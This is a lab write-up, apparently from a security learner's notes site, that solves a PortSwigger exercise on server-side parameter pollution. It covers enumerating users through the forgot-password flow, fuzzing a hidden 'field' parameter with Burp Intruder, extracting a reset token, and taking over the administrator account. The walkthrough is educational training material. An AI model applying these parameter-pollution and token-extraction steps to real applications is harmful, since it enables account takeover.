search
HomeGitHubPortfolio Twitter/X Medium Cont@ct

flask-vialExploiting server-side parameter pollution in a query string

https://portswigger.net/web-security/learning-paths/api-testing/api-testing-testing-for-server-side-parameter-pollution-in-the-query-string/api-testing/server-side-parameter-pollution/lab-exploiting-s

hashtag
Description

To solve the lab, log in as the administrator and delete carlos.

hashtag
Solution

In this case we don't know any credential account, so we can try to login with an example of credential like as 'administrator' and 'password'. Of course the credentials are wrong, so we can use the forgot password (/forgot-password)function to try to retrieve credentials

Here, we can start the procedure to retrieve 'administrator' credentials, trying others account like as: 'alex' we receive an error regarding account don't found.

System send to the administrator's email the code/link to change password, but the first part of email is censured.

Analyzing request with Burp there's an interesting file javascript: /static/js/forgotPassword.js that contain a function to reset token:

Pass to check /login page, and try to check methods allowed via OPTION method:

the method is not allowed, but permit us to discover that GET and POST methods are allowed.

We can try to insert an username that's not exists (alex) and another one that exists (administrator), seeing a different response:

So, we can proceed using Burp Intruder fuzzing username parameter and finding that field payload exists:

Adding field as parameter and his value, we're able to extract username value:

While, doing the same for field=password we obtain a 400 status code:

Remember the javascript file, there's this interesting path in which is inserted a resetToken value:

So, doing a POST request in which we assigned reset_token to field parameter we can extract the relative reset token as response:

and doing GET /forgot-password?reset_token=y8xhpee8hgln52pc9fbj418fu0nxavev

we can reset correctly the password changing it:

Now we're administrator user and going to Admin panel is possible to delete Carlos user solving the lab.

PreviousServer-side parameter pollutionNextDeserialization Insecure

Last updated